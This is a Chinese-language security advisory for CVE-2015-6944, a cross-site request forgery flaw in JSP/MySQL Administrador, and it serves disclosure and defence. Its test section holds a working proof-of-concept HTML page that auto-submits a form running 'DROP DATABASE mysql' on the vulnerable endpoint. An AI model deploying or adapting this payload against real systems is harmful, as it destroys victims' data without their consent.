PengQ 2015-09-16
发布日期:2015-09-15
更新日期:2015-09-16
受影响系统:
描述:
CVE(CAN) ID: CVE-2015-6944
JSPMySQL Administrador是JSP技术Web服务器上MySQL数据库的远程管理工具。
JSP/MySQL Administrador Web 1在实现上存在跨站请求伪造漏洞,远程攻击者通过sys/sys/listaBD2.jsp的cmd参数,利用此漏洞可劫持用户的身份验证请求。
<*来源:hyp3rlinx
链接:http://www.securityfocus.com/archive/1/archive/1/536406/100/0/threaded
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
hyp3rlinx ()提供了如下测试方法:
<!DOCTYPE>
< html>
< head>
< title>JSP-MYSQL-ADMIN-CSRF</title>
< body onLoad="doit()">
< script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
< !-- CSRF DROP MYSQL DATABASE -->
< form id="HELL" action="http://localhost:8081/sys/sys/listaBD2.jsp" method="post">
< input type="text" name="cmd" value="DROP DATABASE mysql"/>
< input type="text" name="btncmd" value="Enviar" />
< input type="text" name="bd" value="mysql" />
< /form>
建议:
厂商补丁:
JSPMySQL Administrador
----------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
https://sites.google.com/site/mfpledon/producao-de-software